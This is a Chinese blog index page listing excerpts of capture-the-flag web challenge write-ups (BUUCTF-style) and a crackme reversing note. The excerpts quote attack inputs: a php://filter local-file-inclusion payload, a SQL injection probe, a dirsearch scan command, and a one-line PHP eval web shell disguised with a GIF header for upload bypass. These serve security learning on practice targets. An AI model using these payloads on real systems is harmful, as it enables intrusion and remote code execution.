2025年5月22日
New160CrackMe之riijj_cm
摘要: exeinfo查壳,未发现壳,是VC++5.0编写的32位程序 运行程序:没有错误回显,但是提示name长度需要4-15 用x32dbg打开,打开字符串视图: 猜测这是正确回显,双击定位到对应代码段 下断点,开始调试,发现怎么都运行不了, 会暂停于00000000,这个地址访问不了导致了异常之后停止 阅读全文
posted @ 2025-05-22 16:08 一只本本 阅读(15) 评论(0) 推荐(0)
2024年11月20日
[BSidesCF 2020]Had a bad day
摘要: 打开页面,测试功能发现是一个鼓励网站,点击下面的两个按钮会给category传一个参数 感觉存在文件包含漏洞,先用base64伪协议尝试读取一下源码 ?category=php://filter/convert.base64-encode/resource=index.php 发现报错了嗷,根据提示 阅读全文
posted @ 2024-11-20 23:10 一只本本 阅读(28) 评论(0) 推荐(0)
[网鼎杯 2018]Fakebook
摘要: 访问网站的robots.txt,看看有没有线索 找到了user.php的源码,直接访问这个备份文件。下载完成直接打开用就好,记事本就可以打开.bak文件 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = 阅读全文
posted @ 2024-11-20 22:08 一只本本 阅读(13) 评论(0) 推荐(0)
[BJDCTF2020]Easy MD5
摘要: 打开输入字符后提交没有回显,查看header发现有hint。重点是md5函数,用法: md5(*string*, *raw*=FALSE),当只接受一个参数时会返回字符串的md5值,当把第二个参数的值设置为TRUE,会返回生成md5值的二进制格式,即根据ascii码值转码。 根据这个特性,就存在一个 阅读全文
posted @ 2024-11-20 21:59 一只本本 阅读(132) 评论(0) 推荐(0)
[极客大挑战 2019]BuyFlag
摘要: 点击右上角的菜单,有一个payflag,直接点击,进入到了pay.php页面 发现,需要得到flag有两个要求:必须是该校的学生,密码必须正确。 在该页面的网页底部,有代码提示,要求密码不能是纯数字,最后又要==404密码才正确。我们可以想到利用php的弱类型比较:只要前缀有404就好。 那需要做的 阅读全文
posted @ 2024-11-20 21:55 一只本本 阅读(48) 评论(0) 推荐(0)
[RoarCTF 2019]Easy Calc
摘要: 打开是一个计算器 查看网页源码发现,程序通过调用clac.php文件给num传参再计算,其中encodeURIComponent函数对计算表达式中的符号进行转码。例如表达式为1+1,则返回1%2B1,故url为calc.php?num=1%2B1。另外这里还提示我们他已经部署了waf,waf会过滤一 阅读全文
posted @ 2024-11-20 21:53 一只本本 阅读(110) 评论(0) 推荐(0)
[ACTF2020 新生赛]BackupFile
摘要: 使用dirsearch扫描: dirsearch -u http://b31cefa6-24d4-4f14-82c3-0fdba166cecf.node5.buuoj.cn:81/ -e bak -t 1 -d 1 -o ./reports/buuoj.txt 扫描结果为: 文件扫描得到命令inde 阅读全文
posted @ 2024-11-20 21:50 一只本本 阅读(113) 评论(0) 推荐(0)
[极客大挑战 2019]PHP
摘要: dirsearch扫描网站目录,对扫描到的结果用grep查找200的结果 发现有一个www.zip网站备份文件,访问www.zip,下载之后对代码进行审计, 查看flag.php,结果不对。 index.php有一段include调用 审计class.php <?php include 'flag. 阅读全文
posted @ 2024-11-20 21:46 一只本本 阅读(9) 评论(0) 推荐(0)
[极客大挑战 2019]BabySQL
摘要: 打开页面是一个登录界面,直接用admin’ or 1#试试深浅 回显为: 这里我们分析一下这个报错,near后跟的单引号中的内容为1#' and password='a',那么说明sql语句就是从这里开始语法不正确的,模拟一下正常的sql应该是select * from table where us 阅读全文
posted @ 2024-11-20 21:40 一只本本 阅读(128) 评论(0) 推荐(0)
[ACTF2020 新生赛]Upload
摘要: 打开页面,点击灯泡出现上传按钮 上传phtml_get.phtml的shell文件,文件内容为: GIF89a <script language='php'>@eval($_GET['aa']);</script> 访问文件,使用system命令查看/upload/phtml_get.phtml?a 阅读全文
posted @ 2024-11-20 21:30 一只本本 阅读(27) 评论(0) 推荐(0)